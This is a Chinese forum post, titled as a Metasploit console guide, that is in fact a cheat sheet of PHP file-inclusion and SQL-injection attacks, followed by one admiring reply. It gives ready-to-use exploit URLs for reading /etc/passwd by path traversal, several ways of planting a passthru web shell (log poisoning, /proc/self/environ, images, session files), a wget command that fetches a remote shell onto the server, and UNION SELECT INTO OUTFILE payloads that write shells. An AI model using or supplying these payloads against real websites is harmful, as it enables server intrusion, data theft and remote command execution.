搜索
查看: 2579|回复: 1

Msfconsole常用技能

[复制链接]

674

主题

981

帖子

2485

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2485

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2017-12-27 07:14:57 来自手机 | 显示全部楼层 |阅读模式
Type of call:
require($file);
Exploit:
http://www.a.com/?file=/etc/passwd
Type of call:
require(“includes/”.$file);
Exploit:
http://www.a.com/?file=../../../../../etc/passwd
Tpye of calls:
require(“languages/”.$lang.”.php”);
require(“themes/”.$theme.”/config.php”);
Exploit:
http://www.a.com/?file=../../../../../etc/passwd%00
Type of call:
require(“languages/”.$_COOKIE['lang'].”.php”);
Exploit:
javascript:document.cookie = “lan=../../../../../etc/passwd%00″;

2、包含命令执行

当能够把这句代码<? passthru($_GET[cmd]) ?> 上传到服务器,然后利用文件包含就可以。

利用方式1:将内容插入apache日志里面。

请求不存在的页面:http://www.a.com/xxxxxxx=<? passthru($_GET[cmd]) ?>
然后按照前面的方式请求:
http://www.a.com/?file=../../../var/apache/error_log&cmd=ls /etc
http://www.a.com/?file=../../../var/apache/error_log&cmd=uname -a
如果不知道apache地址,可以利用包含已有的文件报错来爆出当前位置,当然这个也得依靠不同的操作系统,apache默认地址不一样。
另外可以通过枚举进程表来定位apache日志路径。/proc/{PID}/fd/{FD_ID}
代码(略)
pepelux:~$ perl proc.pl http://www.a.com/index.php page GET
Apache PID: 4191
FD_SIZE: 64
FD: 2
得到PID 和 FD_ID后就可以这么构造。
http://www.a.com/?file=/proc/4191/fd/2&cmd=uname -a
http://www.a.com/index.php?x=<? passthru($_GET[cmd]) ?>
如果不成功,把<?转为16进制。
不行的话还可以把段字符放在header字段里面,比如说User-Agent、Referer

利用方式2:通过环境变量进行插入
/proc/self 指向最后一个PID使用的链接。
/proc/self/environ 是一个已知的路径,但是一般用户没权限读取。
在linux系统中,/proc/self是因为是个能写的环境变量,而且位置是固定的。
利用的话先把利用代码放在User-Agent进行提交,
然后请求:
http://www.a.com/?file=../../../proc/self/environ&cmd=uname -a
没看懂,一般权限应该不行。

利用方式3:将代码插入到图片中
讲一句话添加到图片中,然后上传直接利用。
http://www.a.com/?file=path/avatar.gif&cmd=uname -a

利用方式4:将代码插入到session文件中
如果是通过session验证的,并且知道session的字段。
http://www.a.com/?user=<? passthru($_GET[cmd]) ?>
找session值(浏览器)和文件位置(一般/tmp/session值)。
然后直接包含。

利用方式5: 其他文件
其他日志,FTP的话提交用户名为<? passthru($_GET[cmd]) ?>
服务器版本较老的话,可以利用PUT方式提交代码。

获取shell:
http://www.a.com/?file=xxxx&cmd=wget http://devil/shell.txt -O shell.php

3、注入与文件包含

方式1:注入读取关键文件
http://www.a.com/?id=-1 UNION SELECT 1,2,3,load_file(‘/etc/passwd’);
magic_quotes开启的话
http://www.a.com/?id=-1 UNION SELECT 1,2,3,load_file(0x2f6574632f706173737764);

方式2:先导出然后读取
http://www.a.com/?id=1 outfile “/tmp/sql.txt”
http://www.a.com/?id=-1 UNION SELECT 1,2,3,load_file(‘/tmp/sql.txt’);

方式3:直接生成一句话
http://www.a.com/?id=-1 union select 1,load_file(“/etc/passwd”),1 into outfile “/var/www/host.com/www/passwd”
http://www.a.com/?id=-1 union select 1,”<?phpinfo()?>”,1 into outfile “/var/www/host.com/www/phpinfo.php”
如果目录不能写,可以先导出到tmp
http://host/?id=-1 union select 1,”<? passthru($_GET[cmd]) ?>”,1,1 into outfile “/tmp/sql.txt”
http://host/?file=../../../tmp/sql.txt&cmd=uname -a

补充说明:
1) php5.3.4以后已经修复了%00漏洞。
2) 前段时间
select * from kj_tab limit 1 INTO OUTFILE “d:/kj.txt” LINES TERMINATED BY “<?php eval($living)?>”

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?注册

x
回复

使用道具 举报

0

主题

11

帖子

32

积分

新手开车

Rank: 1

积分
32
发表于 2017-12-27 20:38:25 来自手机 | 显示全部楼层
好棒啊!秘籍
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表